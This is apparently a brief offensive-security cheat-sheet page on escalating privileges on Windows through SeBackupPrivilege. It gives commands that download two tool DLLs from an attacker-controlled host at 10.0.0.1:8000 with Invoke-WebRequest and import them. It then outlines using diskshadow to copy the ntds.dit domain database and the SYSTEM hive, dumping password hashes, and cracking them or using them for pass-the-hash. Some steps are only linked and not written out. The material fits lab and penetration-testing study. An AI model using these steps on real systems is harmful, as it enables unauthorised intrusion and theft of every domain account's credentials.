Page cover

Windows PrivEsc with SeBackupPrivilege

SeBackupPrivilege allows users to retrieve file contents.

First check if the current user has SeBackupPrivilege in the privilege information.

whoami /all
Copied!

If so, we can read arbitrary files on the system include administrator's files, SAML file, SYSTEM registry file, etc.

In local machine, download malicious dlls from herearrow-up-right

# If powershell,
Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeUtils.dll -OutFile .\SeBackupPrivilegeUtils.dll
Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeCmdLets.dll -OutFile .\SeBackupPrivilegeCmdLets.dll
# If winrm,
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Set-SeBackupPrivilege
Get-SeBackupPrivilege
Copied!

Create "diskshadow.txt" in local machine. It referes to thisarrow-up-right.

Upload this file to remote machine.

Then execute diskshadow.exe.

We can download two dll files from herearrow-up-right.

Now we have two files (ntds.dit and system) in local machine. We can dump password hashes using the files.

After that, crack the hashes or use them for pass-the-hash.

Last updated